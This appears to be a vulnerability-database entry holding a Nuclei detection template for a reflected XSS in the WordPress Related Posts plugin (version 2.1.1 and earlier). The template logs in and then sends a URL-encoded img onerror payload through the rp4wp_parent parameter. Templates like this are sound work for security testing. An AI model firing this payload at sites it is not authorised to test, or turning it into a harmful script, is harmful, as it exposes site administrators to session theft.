漏洞描述
WordPress Related Posts plugin before 2.1.1 contains an Reflected XSS via rp4wp_parent
wp-related-post-xss: WordPress Related Posts <= 2.1.1 - Cross Site Scripting
PoC代码[已公开]
id: wp-related-post-xss
info:
name: WordPress Related Posts <= 2.1.1 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
WordPress Related Posts plugin before 2.1.1 contains an Reflected XSS via rp4wp_parent
reference:
- https://huntr.dev/bounties/7c9bd2d2-2a6f-420c-a45e-716600cf810e/
- https://wordpress.org/plugins/wordpress-23-related-posts-plugin/advanced/
metadata:
verified: true
max-request: 2
tags: wp-plugin,xss,relatedposts,authenticated,huntr,wordpress,wp,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>&action=edit'
- 'All Posts</a>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a00463044022063f6ae655108d5992e796ddaad90f57388cc29fd42b5eb6e6bebbb074f9a8e7e02200e544a3cb8cde401ec71773f58e1a281c301df2eadf4b968afcc90b3815ce1cd:922c64590222798bb761d5b6d8e72950